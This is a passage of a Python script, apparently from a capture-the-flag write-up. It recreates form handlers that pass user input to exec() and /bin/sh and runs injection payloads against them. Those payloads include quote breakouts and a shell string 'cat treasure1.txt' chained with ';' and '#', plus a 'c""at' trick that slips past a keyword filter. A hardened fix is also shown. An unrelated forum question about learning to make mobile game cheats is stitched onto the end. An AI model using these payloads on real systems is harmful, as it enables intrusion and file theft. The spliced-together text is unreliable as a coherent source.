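    cmd = f"print('{fct1}' * {fct2})"
    f = io.StringIO()
    with contextlib.redirect_stdout(f):
        exec(cmd)
    return f.getvalue()


def sh_lines(cmd):
    with subprocess.Popen(["/bin/sh", "-c", cmd],
                          stdout=subprocess.PIPE, stderr=subprocess.PIPE) as p:
        return [line.decode("ascii", "replace").strip() for line in p.stdout]


def issue4(fct1, fct2):
    return sh_lines(f"/usr/bin/expr {fct1} + {fct2}")


def issue5(cmd):
    # ASSUMPTION: the post says "cat" is refused but the excerpt omits the check;
    # a plain substring test stands in for it here.
    if "cat" in cmd:
        return ["refused"]
    return sh_lines(cmd)


# --- inputs for the form fields; each one breaks out of the literal it is spliced into ---

PAYLOADS = {
    # '' + <file> + ''.upper()  : close the quote, concatenate the file, reopen the quote
    "issue2": ("'+open('treasure1.txt').read()+'",),
    # print('aap' * 1); print(<file>); (1)  : the "number" box is unquoted inside exec()
    "issue3": ("aap", "1); print(open('treasure1.txt').read()); (1"),
    # /usr/bin/expr 0 ; cat treasure1.txt ; # + 2  : ';' ends expr, '#' eats the rest
    "issue4": ("0 ; cat treasure1.txt ; #", "2"),
    # sh joins c""at back into cat, so a substring filter never sees the word
    "issue5": ('c""at treasure1.txt',),
}


def issue4_fixed(fct1, fct2):
    """Hardened form: validate both fields as integers and pass an argv list,
    so no shell ever parses user text."""
    a, b = int(fct1), int(fct2)                    # raises ValueError on "0 ; cat ..."
    out = subprocess.run(["/usr/bin/expr", str(a), "+", str(b)],
                         capture_output=True, text=True)
    return out.stdout.strip()


def demo():
    work = tempfile.mkdtemp()
    with open(os.path.join(work, "treasure1.txt"), "w") as fh:
        fh.write(TREASURE + "\n")
    old = os.getcwd()
    os.chdir(work)   # the handlers open the file relative to the cwd, as the challenge does
    try:
        return {
            "issue2": issue2(*PAYLOADS["issue2"]),
            "issue3": issue3(*PAYLOADS["issue3"]),
            "issue4": issue4(*PAYLOADS["issue4"]),
            "issue5": issue5(*PAYLOADS["issue5"]),
        }
    finally:
        os.chdir(old)


if __name__ == "__main__":
    for name, output in demo().items():
        print(name, "->", output)
```

For issue2 the same shape also works with .upper() left intact (the concatenated string is returned before upper-casing only because of operator precedence; a payload ending in `'+'` instead would upper-case the flag, which is still readable). The fix for all of them is the one shown for issue4: never assemble code or shell text from input; call wrd.upper() directly and pass arguments as a list.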
I know this is most definitely unethical, but where should one start if one wanted to learn making game cheats. I'm not talking about making game cheats for big games stuff like Call of Duty or whatnot, just basic mobile games. I know i should learn lua but other than that i have no other clue. anyone who can help?